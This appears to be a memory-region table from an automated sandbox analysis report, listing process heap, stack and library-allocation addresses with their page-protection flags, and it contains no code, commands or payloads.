28006984000
|
heap
|
page read and write
|
||
7FF8488B4000
|
trusted library allocation
|
page read and write
|
||
1ECF3B90000
|
trusted library allocation
|
page read and write
|
||
7FF848AE7000
|
trusted library allocation
|
page read and write
|
||
1E3D1B25000
|
heap
|
page read and write
|
||
2183E4E4000
|
trusted library allocation
|
page read and write
|
||
218568C4000
|
heap
|
page read and write
|
||
1D06A000
|
stack
|
page read and write
|
||
1BD50000
|
heap
|
page read and write
|
||
28007C8A000
|
trusted library allocation
|
page read and write
|
||
2183C301000
|
heap
|
page read and write
|
||
1ECF3AE0000
|
heap
|
page execute and read and write
|
||
7FF848B30000
|
trusted library allocation
|
page read and write
|
||
20937491000
|
trusted library allocation
|
page read and write
|
||
97F95AE000
|
stack
|
page read and write
|
||
28016CB6000
|
trusted library allocation
|
page read and write
|
||
1ECF4498000
|
heap
|
page read and write
|
||
7FF848AB0000
|
trusted library allocation
|
page read and write
|
||
2183E3A9000
|
trusted library allocation
|
page read and write
|
||
7FF848B20000
|
trusted library allocation
|
page read and write
|
||
1E3B7820000
|
trusted library allocation
|
page read and write
|
||
2801EF56000
|
heap
|
page read and write
|
||
2183E0F4000
|
heap
|
page read and write
|
||
7FF848BF0000
|
trusted library allocation
|
page read and write
|
||
7FF848A4D000
|
trusted library allocation
|
page read and write
|
||
BB789FE000
|
stack
|
page read and write
|
||
7FF848894000
|
trusted library allocation
|
page read and write
|
||
7FF848AC0000
|
trusted library allocation
|
page read and write
|
||
2341CCE2000
|
trusted library allocation
|
page read and write
|
||
1E3B76D4000
|
heap
|
page read and write
|
||
2341CEBC000
|
trusted library allocation
|
page read and write
|
||
97F9B77000
|
stack
|
page read and write
|
||
1C76B000
|
stack
|
page read and write
|
||
7FF848B20000
|
trusted library allocation
|
page read and write
|
||
7FF848BA0000
|
trusted library allocation
|
page read and write
|
||
7FF848AC0000
|
trusted library allocation
|
page read and write
|
||
5B569FA000
|
stack
|
page read and write
|
||
28016CCB000
|
trusted library allocation
|
page read and write
|
||
1E3B7A10000
|
trusted library allocation
|
page read and write
|
||
2184E463000
|
trusted library allocation
|
page read and write
|
||
7FF848AD0000
|
trusted library allocation
|
page read and write
|
||
2341CAAA000
|
trusted library allocation
|
page read and write
|
||
7FF848AD8000
|
trusted library allocation
|
page read and write
|
||
7FF848AC1000
|
trusted library allocation
|
page read and write
|
||
28004C4D000
|
heap
|
page read and write
|
||
7FF848BE5000
|
trusted library allocation
|
page read and write
|
||
1EC80001000
|
trusted library allocation
|
page read and write
|
||
7FF848C00000
|
trusted library allocation
|
page read and write
|
||
7FF848A70000
|
trusted library allocation
|
page execute and read and write
|
||
234352F4000
|
heap
|
page read and write
|
||
97FA94E000
|
stack
|
page read and write
|
||
7FF848A47000
|
trusted library allocation
|
page read and write
|
||
218569E6000
|
heap
|
page read and write
|
||
2AEB8960000
|
heap
|
page execute and read and write
|
||
2341CABE000
|
trusted library allocation
|
page read and write
|
||
7FF848AA0000
|
trusted library allocation
|
page read and write
|
||
28007DA7000
|
trusted library allocation
|
page read and write
|
||
7FF848A60000
|
trusted library allocation
|
page read and write
|
||
1EC81099000
|
trusted library allocation
|
page read and write
|
||
21856B87000
|
heap
|
page read and write
|
||
20936FA3000
|
trusted library allocation
|
page read and write
|
||
2184E9C1000
|
trusted library allocation
|
page read and write
|
||
7FF8489A0000
|
trusted library allocation
|
page execute and read and write
|
||
2342D24F000
|
trusted library allocation
|
page read and write
|
||
1C445000
|
stack
|
page read and write
|
||
1710000
|
heap
|
page read and write
|
||
5B575FD000
|
stack
|
page read and write
|
||
7FF848AA0000
|
trusted library allocation
|
page read and write
|
||
7FF848A22000
|
trusted library allocation
|
page read and write
|
||
3152000
|
trusted library allocation
|
page read and write
|
||
7FF848A31000
|
trusted library allocation
|
page read and write
|
||
7FF848B40000
|
trusted library allocation
|
page read and write
|
||
2343569E000
|
heap
|
page read and write
|
||
7FF8488C0000
|
trusted library allocation
|
page read and write
|
||
7FF848B40000
|
trusted library allocation
|
page read and write
|
||
2341CCBA000
|
trusted library allocation
|
page read and write
|
||
2183C4B3000
|
heap
|
page execute and read and write
|
||
7FF848A90000
|
trusted library allocation
|
page read and write
|
||
7FF848ABB000
|
trusted library allocation
|
page read and write
|
||
2183E338000
|
trusted library allocation
|
page read and write
|
||
2183E443000
|
trusted library allocation
|
page read and write
|
||
30FD000
|
trusted library allocation
|
page read and write
|
||
7FF848B30000
|
trusted library allocation
|
page read and write
|
||
2183E706000
|
trusted library allocation
|
page read and write
|
||
2341AF9C000
|
heap
|
page read and write
|
||
2184E1C1000
|
trusted library allocation
|
page read and write
|
||
2800816E000
|
trusted library allocation
|
page read and write
|
||
28007946000
|
trusted library allocation
|
page read and write
|
||
1ECF20E0000
|
heap
|
page read and write
|
||
7FF848D00000
|
trusted library allocation
|
page read and write
|
||
28016C1D000
|
trusted library allocation
|
page read and write
|
||
2183E430000
|
trusted library allocation
|
page read and write
|
||
2AEC8CFB000
|
trusted library allocation
|
page read and write
|
||
7FF848AD1000
|
trusted library allocation
|
page read and write
|
||
7FF848B81000
|
trusted library allocation
|
page read and write
|
||
2185698B000
|
heap
|
page read and write
|
||
2AEB6F90000
|
trusted library allocation
|
page read and write
|
||
1ECF40A5000
|
heap
|
page read and write
|
||
2801F0C0000
|
heap
|
page read and write
|
||
1EC902EC000
|
trusted library allocation
|
page read and write
|
||
28004C5F000
|
heap
|
page read and write
|
||
28016A52000
|
trusted library allocation
|
page read and write
|
||
1ECF43CE000
|
heap
|
page read and write
|
||
2AED0EE0000
|
heap
|
page read and write
|
||
7FF8488B4000
|
trusted library allocation
|
page read and write
|
||
1CD80000
|
heap
|
page read and write
|
||
318E000
|
trusted library allocation
|
page read and write
|
||
7FF848CB0000
|
trusted library allocation
|
page read and write
|
||
28004F50000
|
heap
|
page read and write
|
||
8C61AF7000
|
stack
|
page read and write
|
||
7FF84888D000
|
trusted library allocation
|
page execute and read and write
|
||
23435737000
|
heap
|
page read and write
|
||
2183E5A7000
|
trusted library allocation
|
page read and write
|
||
7FF848B00000
|
trusted library allocation
|
page read and write
|
||
2183E59A000
|
trusted library allocation
|
page read and write
|
||
218568E5000
|
heap
|
page read and write
|
||
2AEC8CF3000
|
trusted library allocation
|
page read and write
|
||
2183E7A7000
|
trusted library allocation
|
page read and write
|
||
2183E3C4000
|
trusted library allocation
|
page read and write
|
||
28006921000
|
heap
|
page read and write
|
||
2341AEBE000
|
heap
|
page read and write
|
||
218569CF000
|
heap
|
page read and write
|
||
2183C2E2000
|
heap
|
page read and write
|
||
2341CD70000
|
trusted library allocation
|
page read and write
|
||
21856A83000
|
heap
|
page read and write
|
||
3102000
|
trusted library allocation
|
page read and write
|
||
2184E46B000
|
trusted library allocation
|
page read and write
|
||
1260000
|
trusted library allocation
|
page read and write
|
||
2AEB7000000
|
heap
|
page read and write
|
||
7FF848AC0000
|
trusted library allocation
|
page read and write
|
||
1E3C93A4000
|
trusted library allocation
|
page read and write
|
||
28004B40000
|
heap
|
page read and write
|
||
21856BB7000
|
heap
|
page read and write
|
||
21856BE4000
|
heap
|
page read and write
|
||
7FF8488BD000
|
trusted library allocation
|
page execute and read and write
|
||
2AEB6E39000
|
heap
|
page read and write
|
||
1CD70000
|
heap
|
page read and write
|
||
1EC81E06000
|
trusted library allocation
|
page read and write
|
||
3118000
|
trusted library allocation
|
page read and write
|
||
7FF848956000
|
trusted library allocation
|
page read and write
|
||
5B571F8000
|
stack
|
page read and write
|
||
2183C585000
|
heap
|
page read and write
|
||
7FF848B1B000
|
trusted library allocation
|
page read and write
|
||
28004B50000
|
heap
|
page read and write
|
||
21856880000
|
heap
|
page read and write
|
||
2183E402000
|
trusted library allocation
|
page read and write
|
||
2183DFC0000
|
heap
|
page read and write
|
||
7FF848CF0000
|
trusted library allocation
|
page read and write
|
||
1EC80228000
|
trusted library allocation
|
page read and write
|
||
1ECF44AC000
|
heap
|
page read and write
|
||
7FF8488A0000
|
trusted library allocation
|
page read and write
|
||
7FF8488FC000
|
trusted library allocation
|
page execute and read and write
|
||
28007BF7000
|
trusted library allocation
|
page read and write
|
||
7FF848AE6000
|
trusted library allocation
|
page read and write
|
||
1ECF4485000
|
heap
|
page read and write
|
||
7FF848AD6000
|
trusted library allocation
|
page read and write
|
||
2183C332000
|
heap
|
page read and write
|
||
20925500000
|
heap
|
page read and write
|
||
7FF8488B2000
|
trusted library allocation
|
page read and write
|
||
1ECF20F0000
|
trusted library allocation
|
page read and write
|
||
7FF848880000
|
trusted library allocation
|
page read and write
|
||
1EC812AE000
|
trusted library allocation
|
page read and write
|
||
20925570000
|
heap
|
page read and write
|
||
1D46C000
|
stack
|
page read and write
|
||
7FF848AD0000
|
trusted library allocation
|
page read and write
|
||
1E3B75A0000
|
heap
|
page read and write
|
||
2183E50C000
|
trusted library allocation
|
page read and write
|
||
2AEC8CEC000
|
trusted library allocation
|
page read and write
|
||
2183C598000
|
heap
|
page read and write
|
||
7FF848BB3000
|
trusted library allocation
|
page read and write
|
||
1ECF1FF9000
|
heap
|
page read and write
|
||
3192000
|
trusted library allocation
|
page read and write
|
||
2183E7E1000
|
trusted library allocation
|
page read and write
|
||
7FF84889B000
|
trusted library allocation
|
page read and write
|
||
7FF848BB3000
|
trusted library allocation
|
page read and write
|
||
2183E08A000
|
heap
|
page read and write
|
||
7FF848966000
|
trusted library allocation
|
page execute and read and write
|
||
1EC810C5000
|
trusted library allocation
|
page read and write
|
||
1E3D1230000
|
trusted library allocation
|
page read and write
|
||
234354D2000
|
heap
|
page read and write
|
||
2341CCC8000
|
trusted library allocation
|
page read and write
|
||
7FF848B60000
|
trusted library allocation
|
page execute and read and write
|
||
7FF8488D4000
|
trusted library allocation
|
page read and write
|
||
7FF848950000
|
trusted library allocation
|
page read and write
|
||
97F9CFF000
|
stack
|
page read and write
|
||
7FF848B60000
|
trusted library allocation
|
page read and write
|
||
1BA3E000
|
stack
|
page read and write
|
||
280069D0000
|
heap
|
page execute and read and write
|
||
21856C3F000
|
heap
|
page read and write
|
||
7FF848A80000
|
trusted library allocation
|
page read and write
|
||
2341CD3E000
|
trusted library allocation
|
page read and write
|
||
7FF848BB0000
|
trusted library allocation
|
page read and write
|
||
A85AFFE000
|
stack
|
page read and write
|
||
234354C8000
|
heap
|
page read and write
|
||
2183C490000
|
trusted library allocation
|
page read and write
|
||
7FF848BA0000
|
trusted library allocation
|
page read and write
|
||
1ECF3BE6000
|
heap
|
page read and write
|
||
1ECF43DA000
|
heap
|
page read and write
|
||
21856B93000
|
heap
|
page read and write
|
||
7FF848AB0000
|
trusted library allocation
|
page read and write
|
||
7FF848B70000
|
trusted library allocation
|
page read and write
|
||
7FF848B90000
|
trusted library allocation
|
page read and write
|
||
2AED107C000
|
heap
|
page read and write
|
||
7FF848A50000
|
trusted library allocation
|
page read and write
|
||
28004C3F000
|
heap
|
page read and write
|
||
7FF848A40000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848A57000
|
trusted library allocation
|
page read and write
|
||
1BAA3000
|
heap
|
page read and write
|
||
20937063000
|
trusted library allocation
|
page read and write
|
||
2183E61F000
|
trusted library allocation
|
page read and write
|
||
21856BC5000
|
heap
|
page read and write
|
||
2341CBDF000
|
trusted library allocation
|
page read and write
|
||
7FF848893000
|
trusted library allocation
|
page execute and read and write
|
||
28004E70000
|
trusted library allocation
|
page read and write
|
||
7FF848950000
|
trusted library allocation
|
page read and write
|
||
2341CC5C000
|
trusted library allocation
|
page read and write
|
||
2092517A000
|
heap
|
page read and write
|
||
7FF848C30000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848A60000
|
trusted library allocation
|
page read and write
|
||
2341C800000
|
heap
|
page execute and read and write
|
||
2183E0FE000
|
heap
|
page read and write
|
||
2341AEB5000
|
heap
|
page read and write
|
||
7FF8488AD000
|
trusted library allocation
|
page execute and read and write
|
||
8C618FE000
|
stack
|
page read and write
|
||
7FF848A5B000
|
trusted library allocation
|
page read and write
|
||
12A6000
|
heap
|
page read and write
|
||
1EC8112A000
|
trusted library allocation
|
page read and write
|
||
311F000
|
trusted library allocation
|
page read and write
|
||
2AEC8A21000
|
trusted library allocation
|
page read and write
|
||
7DF480F60000
|
trusted library allocation
|
page execute and read and write
|
||
1ECF4315000
|
heap
|
page read and write
|
||
7FF8488A0000
|
trusted library allocation
|
page read and write
|
||
2341CDDB000
|
trusted library allocation
|
page read and write
|
||
7FF848894000
|
trusted library allocation
|
page read and write
|
||
21856A10000
|
heap
|
page read and write
|
||
7FF848B00000
|
trusted library allocation
|
page read and write
|
||
7FF848940000
|
trusted library allocation
|
page read and write
|
||
7FF848AC8000
|
trusted library allocation
|
page read and write
|
||
28004C88000
|
heap
|
page read and write
|
||
7FF8489C0000
|
trusted library allocation
|
page execute and read and write
|
||
1BDF3000
|
heap
|
page read and write
|
||
7DF480F50000
|
trusted library allocation
|
page execute and read and write
|
||
2341C980000
|
heap
|
page read and write
|
||
2341AF36000
|
heap
|
page read and write
|
||
2183C6B0000
|
heap
|
page read and write
|
||
2AEC8E85000
|
trusted library allocation
|
page read and write
|
||
7FF848AE0000
|
trusted library allocation
|
page read and write
|
||
23435438000
|
heap
|
page read and write
|
||
7FF848B20000
|
trusted library allocation
|
page read and write
|
||
134B000
|
heap
|
page read and write
|
||
1E3B76AC000
|
heap
|
page read and write
|
||
7FF848890000
|
trusted library allocation
|
page read and write
|
||
2183E2BC000
|
trusted library allocation
|
page read and write
|
||
21856980000
|
heap
|
page read and write
|
||
21856BCB000
|
heap
|
page read and write
|
||
1E3B7630000
|
trusted library allocation
|
page read and write
|
||
FE0000
|
heap
|
page read and write
|
||
BB7998E000
|
stack
|
page read and write
|
||
2183E38D000
|
trusted library allocation
|
page read and write
|
||
1ECF3C3B000
|
heap
|
page read and write
|
||
1EC902F1000
|
trusted library allocation
|
page read and write
|
||
7FF848C10000
|
trusted library allocation
|
page read and write
|
||
209250E0000
|
heap
|
page read and write
|
||
2343554D000
|
heap
|
page read and write
|
||
23435783000
|
heap
|
page read and write
|
||
BB79B8C000
|
stack
|
page read and write
|
||
7FF848C8E000
|
trusted library allocation
|
page read and write
|
||
2183C230000
|
heap
|
page read and write
|
||
8C617FE000
|
stack
|
page read and write
|
||
28004EF5000
|
heap
|
page read and write
|
||
2341CF63000
|
trusted library allocation
|
page read and write
|
||
7FF848A44000
|
trusted library allocation
|
page read and write
|
||
2183E024000
|
heap
|
page read and write
|
||
7FF848946000
|
trusted library allocation
|
page read and write
|
||
7FF848B29000
|
trusted library allocation
|
page read and write
|
||
1EC81E26000
|
trusted library allocation
|
page read and write
|
||
7FF84896C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848CA0000
|
trusted library allocation
|
page read and write
|
||
7FF848A80000
|
trusted library allocation
|
page execute and read and write
|
||
2183C580000
|
heap
|
page read and write
|
||
2341CEF8000
|
trusted library allocation
|
page read and write
|
||
7FF8488A0000
|
trusted library allocation
|
page read and write
|
||
28007A10000
|
trusted library allocation
|
page read and write
|
||
7FF848BE2000
|
trusted library allocation
|
page read and write
|
||
2AEB6F50000
|
heap
|
page read and write
|
||
2183E46A000
|
trusted library allocation
|
page read and write
|
||
2AEB9AC9000
|
trusted library allocation
|
page read and write
|
||
7FF848AA4000
|
trusted library allocation
|
page read and write
|
||
7FF8488BB000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848CA0000
|
trusted library allocation
|
page execute and read and write
|
||
2AED10B0000
|
heap
|
page read and write
|
||
7FF848BF0000
|
trusted library allocation
|
page read and write
|
||
2343555A000
|
heap
|
page read and write
|
||
7FF848A40000
|
trusted library allocation
|
page execute and read and write
|
||
2341CB30000
|
trusted library allocation
|
page read and write
|
||
1E3C97D0000
|
trusted library allocation
|
page read and write
|
||
2AEB9B2B000
|
trusted library allocation
|
page read and write
|
||
2183E092000
|
heap
|
page read and write
|
||
7FF8488AD000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848AF0000
|
trusted library allocation
|
page read and write
|
||
234353C6000
|
heap
|
page read and write
|
||
2AEB8C29000
|
trusted library allocation
|
page read and write
|
||
1E3B95DD000
|
trusted library allocation
|
page read and write
|
||
97F98F9000
|
stack
|
page read and write
|
||
7FF84888D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848B50000
|
trusted library allocation
|
page read and write
|
||
1230000
|
trusted library allocation
|
page read and write
|
||
209253F0000
|
trusted library allocation
|
page read and write
|
||
21856C0B000
|
heap
|
page read and write
|
||
2341AF20000
|
heap
|
page read and write
|
||
23435760000
|
heap
|
page read and write
|
||
2183C2EC000
|
heap
|
page read and write
|
||
BB78A79000
|
stack
|
page read and write
|
||
7FF8488DB000
|
trusted library allocation
|
page execute and read and write
|
||
5B545FD000
|
stack
|
page read and write
|
||
2183C2FF000
|
heap
|
page read and write
|
||
1E3B7830000
|
trusted library allocation
|
page read and write
|
||
1E3B79C0000
|
heap
|
page read and write
|
||
7FF8488A2000
|
trusted library allocation
|
page read and write
|
||
7FF848A31000
|
trusted library allocation
|
page read and write
|
||
23435541000
|
heap
|
page read and write
|
||
1EC9030A000
|
trusted library allocation
|
page read and write
|
||
1ECF3BB0000
|
heap
|
page read and write
|
||
7FF848A70000
|
trusted library allocation
|
page execute and read and write
|
||
CDCFFFE000
|
stack
|
page read and write
|
||
1ECF44B5000
|
heap
|
page read and write
|
||
21856ABE000
|
heap
|
page read and write
|
||
28008812000
|
trusted library allocation
|
page read and write
|
||
2AEB6E33000
|
heap
|
page read and write
|
||
1E3D1F3F000
|
heap
|
page read and write
|
||
3150000
|
trusted library allocation
|
page read and write
|
||
1BF4E000
|
stack
|
page read and write
|
||
8C619FD000
|
stack
|
page read and write
|
||
2341CB23000
|
trusted library allocation
|
page read and write
|
||
138C000
|
heap
|
page read and write
|
||
7FF848936000
|
trusted library allocation
|
page read and write
|
||
23435676000
|
heap
|
page read and write
|
||
7FF848A90000
|
trusted library allocation
|
page read and write
|
||
2AEB6DF8000
|
heap
|
page read and write
|
||
CDCF7FE000
|
stack
|
page read and write
|
||
7FF848B90000
|
trusted library allocation
|
page read and write
|
||
1E3D1EF0000
|
heap
|
page read and write
|
||
7FF848CB0000
|
trusted library allocation
|
page execute and read and write
|
||
1ECF1E10000
|
heap
|
page read and write
|
||
234353CB000
|
heap
|
page read and write
|
||
7FF848CE0000
|
trusted library allocation
|
page read and write
|
||
7FF848ADD000
|
trusted library allocation
|
page read and write
|
||
1E3C9201000
|
trusted library allocation
|
page read and write
|
||
97F9BF9000
|
stack
|
page read and write
|
||
7FF848CD6000
|
trusted library allocation
|
page read and write
|
||
7FF848BD4000
|
trusted library allocation
|
page read and write
|
||
2341CAEC000
|
trusted library allocation
|
page read and write
|
||
BB79A87000
|
stack
|
page read and write
|
||
1D070000
|
heap
|
page read and write
|
||
2183E1B0000
|
heap
|
page execute and read and write
|
||
21856A7E000
|
heap
|
page read and write
|
||
2AEC8DAC000
|
trusted library allocation
|
page read and write
|
||
1ECF1F70000
|
heap
|
page read and write
|
||
2184E364000
|
trusted library allocation
|
page read and write
|
||
2AEB89C0000
|
heap
|
page execute and read and write
|
||
2341C880000
|
heap
|
page execute and read and write
|
||
1ECF21D5000
|
heap
|
page read and write
|
||
1E3C92A6000
|
trusted library allocation
|
page read and write
|
||
280069E1000
|
trusted library allocation
|
page read and write
|
||
CDD13FE000
|
stack
|
page read and write
|
||
7FF848A70000
|
trusted library allocation
|
page read and write
|
||
2AEB7080000
|
heap
|
page read and write
|
||
21856BAE000
|
heap
|
page read and write
|
||
7FF848A30000
|
trusted library allocation
|
page read and write
|
||
21856A45000
|
heap
|
page read and write
|
||
1E3B7A50000
|
heap
|
page read and write
|
||
7FF848B20000
|
trusted library allocation
|
page read and write
|
||
2AEB6E4F000
|
heap
|
page read and write
|
||
7FF848A80000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848C00000
|
trusted library allocation
|
page read and write
|
||
2AEB6E7C000
|
heap
|
page read and write
|
||
21856BB2000
|
heap
|
page read and write
|
||
234356B3000
|
heap
|
page read and write
|
||
1ECF4397000
|
heap
|
page read and write
|
||
2801ED40000
|
heap
|
page read and write
|
||
2341CC9A000
|
trusted library allocation
|
page read and write
|
||
7FF848B60000
|
trusted library allocation
|
page read and write
|
||
1ECF1F77000
|
heap
|
page read and write
|
||
2341CF5C000
|
trusted library allocation
|
page read and write
|
||
FA0000
|
heap
|
page read and write
|
||
2341CA90000
|
trusted library allocation
|
page read and write
|
||
7FF848B70000
|
trusted library allocation
|
page read and write
|
||
7FF848A20000
|
trusted library allocation
|
page read and write
|
||
97F9DFE000
|
stack
|
page read and write
|
||
7FF848A50000
|
trusted library allocation
|
page read and write
|
||
28008253000
|
trusted library allocation
|
page read and write
|
||
7FF848BF2000
|
trusted library allocation
|
page read and write
|
||
7FF848880000
|
trusted library allocation
|
page read and write
|
||
7FF848B00000
|
trusted library allocation
|
page read and write
|
||
23435713000
|
heap
|
page read and write
|
||
1EC90001000
|
trusted library allocation
|
page read and write
|
||
BB79B0C000
|
stack
|
page read and write
|
||
2341CAB7000
|
trusted library allocation
|
page read and write
|
||
8C6187A000
|
stack
|
page read and write
|
||
2184E790000
|
trusted library allocation
|
page read and write
|
||
2183E550000
|
trusted library allocation
|
page read and write
|
||
1EC80D71000
|
trusted library allocation
|
page read and write
|
||
1C34E000
|
stack
|
page read and write
|
||
7FF848AD8000
|
trusted library allocation
|
page read and write
|
||
A85C7FF000
|
stack
|
page read and write
|
||
7FF848A64000
|
trusted library allocation
|
page read and write
|
||
2AEB9A3A000
|
trusted library allocation
|
page read and write
|
||
23435705000
|
heap
|
page read and write
|
||
28007AA2000
|
trusted library allocation
|
page read and write
|
||
2AEBA188000
|
trusted library allocation
|
page read and write
|
||
CDD03FE000
|
stack
|
page read and write
|
||
7FF848A90000
|
trusted library allocation
|
page read and write
|
||
209250C0000
|
heap
|
page read and write
|
||
7FF848A6D000
|
trusted library allocation
|
page read and write
|
||
2183E69F000
|
trusted library allocation
|
page read and write
|
||
7FF848950000
|
trusted library allocation
|
page execute and read and write
|
||
1E3C9781000
|
trusted library allocation
|
page read and write
|
||
1ECF21D0000
|
heap
|
page read and write
|
||
7FF848A30000
|
trusted library allocation
|
page read and write
|
||
7FF8488EC000
|
trusted library allocation
|
page execute and read and write
|
||
2341CE03000
|
trusted library allocation
|
page read and write
|
||
7FF8489A5000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848AD0000
|
trusted library allocation
|
page read and write
|
||
7FF8488EC000
|
trusted library allocation
|
page execute and read and write
|
||
12E2000
|
heap
|
page read and write
|
||
7FF848AC8000
|
trusted library allocation
|
page read and write
|
||
8C61DFB000
|
stack
|
page read and write
|
||
1ECF4040000
|
heap
|
page read and write
|
||
28007942000
|
trusted library allocation
|
page read and write
|
||
A85B7FF000
|
stack
|
page read and write
|
||
2183C210000
|
heap
|
page read and write
|
||
7FF848A60000
|
trusted library allocation
|
page read and write
|
||
1BBAE000
|
stack
|
page read and write
|
||
2183E09C000
|
heap
|
page read and write
|
||
28016CD0000
|
trusted library allocation
|
page read and write
|
||
7FF848ABE000
|
trusted library allocation
|
page read and write
|
||
2341AD70000
|
heap
|
page read and write
|
||
2AEB6F10000
|
heap
|
page read and write
|
||
2183E4F8000
|
trusted library allocation
|
page read and write
|
||
20936F8B000
|
trusted library allocation
|
page read and write
|
||
BB78EBA000
|
stack
|
page read and write
|
||
28004BE0000
|
trusted library section
|
page read and write
|
||
7FF848880000
|
trusted library allocation
|
page read and write
|
||
2183E051000
|
heap
|
page read and write
|
||
209250A0000
|
heap
|
page read and write
|
||
7FF8488AA000
|
trusted library allocation
|
page read and write
|
||
2341CE1E000
|
trusted library allocation
|
page read and write
|
||
280069A0000
|
heap
|
page read and write
|
||
7FF848A80000
|
trusted library allocation
|
page read and write
|
||
7FF8488B0000
|
trusted library allocation
|
page read and write
|
||
1EC90031000
|
trusted library allocation
|
page read and write
|
||
5B559FE000
|
stack
|
page read and write
|
||
7FF848D00000
|
trusted library allocation
|
page read and write
|
||
7FF848960000
|
trusted library allocation
|
page read and write
|
||
7FF848A62000
|
trusted library allocation
|
page read and write
|
||
7FF848C90000
|
trusted library allocation
|
page read and write
|
||
7FF848CD0000
|
trusted library allocation
|
page read and write
|
||
7FF848970000
|
trusted library allocation
|
page execute and read and write
|
||
2183E2C0000
|
trusted library allocation
|
page read and write
|
||
7FF848A90000
|
trusted library allocation
|
page read and write
|
||
7FF84894C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848BD4000
|
trusted library allocation
|
page read and write
|
||
2801EF94000
|
heap
|
page read and write
|
||
2183E6C8000
|
trusted library allocation
|
page read and write
|
||
21856BFE000
|
heap
|
page read and write
|
||
97FAB4E000
|
stack
|
page read and write
|
||
7FF848B70000
|
trusted library allocation
|
page execute and read and write
|
||
7FF84895C000
|
trusted library allocation
|
page execute and read and write
|
||
2183C384000
|
heap
|
page read and write
|
||
21856AF5000
|
heap
|
page read and write
|
||
1E3B7650000
|
heap
|
page read and write
|
||
7FF8488DC000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848936000
|
trusted library allocation
|
page read and write
|
||
7FF848B20000
|
trusted library allocation
|
page read and write
|
||
1EC81788000
|
trusted library allocation
|
page read and write
|
||
21856A3D000
|
heap
|
page read and write
|
||
7FF848A4F000
|
trusted library allocation
|
page read and write
|
||
7FF848A64000
|
trusted library allocation
|
page read and write
|
||
7FF848CD6000
|
trusted library allocation
|
page read and write
|
||
234356EE000
|
heap
|
page read and write
|
||
2183E4F1000
|
trusted library allocation
|
page read and write
|
||
7FF848B90000
|
trusted library allocation
|
page read and write
|
||
2343535E000
|
heap
|
page read and write
|
||
97FA9C9000
|
stack
|
page read and write
|
||
7FF848AA0000
|
trusted library allocation
|
page execute and read and write
|
||
2341AF30000
|
heap
|
page read and write
|
||
7FF848A60000
|
trusted library allocation
|
page execute and read and write
|
||
1B0A0000
|
trusted library allocation
|
page read and write
|
||
21856B42000
|
heap
|
page read and write
|
||
7FF848AF0000
|
trusted library allocation
|
page read and write
|
||
7FF848BB0000
|
trusted library allocation
|
page read and write
|
||
1E3B9356000
|
trusted library allocation
|
page read and write
|
||
2AEB8A88000
|
trusted library allocation
|
page read and write
|
||
7FF8488AD000
|
trusted library allocation
|
page execute and read and write
|
||
2AEC8CF1000
|
trusted library allocation
|
page read and write
|
||
7FF848A68000
|
trusted library allocation
|
page read and write
|
There are 1394 hidden memdumps, click here to show them.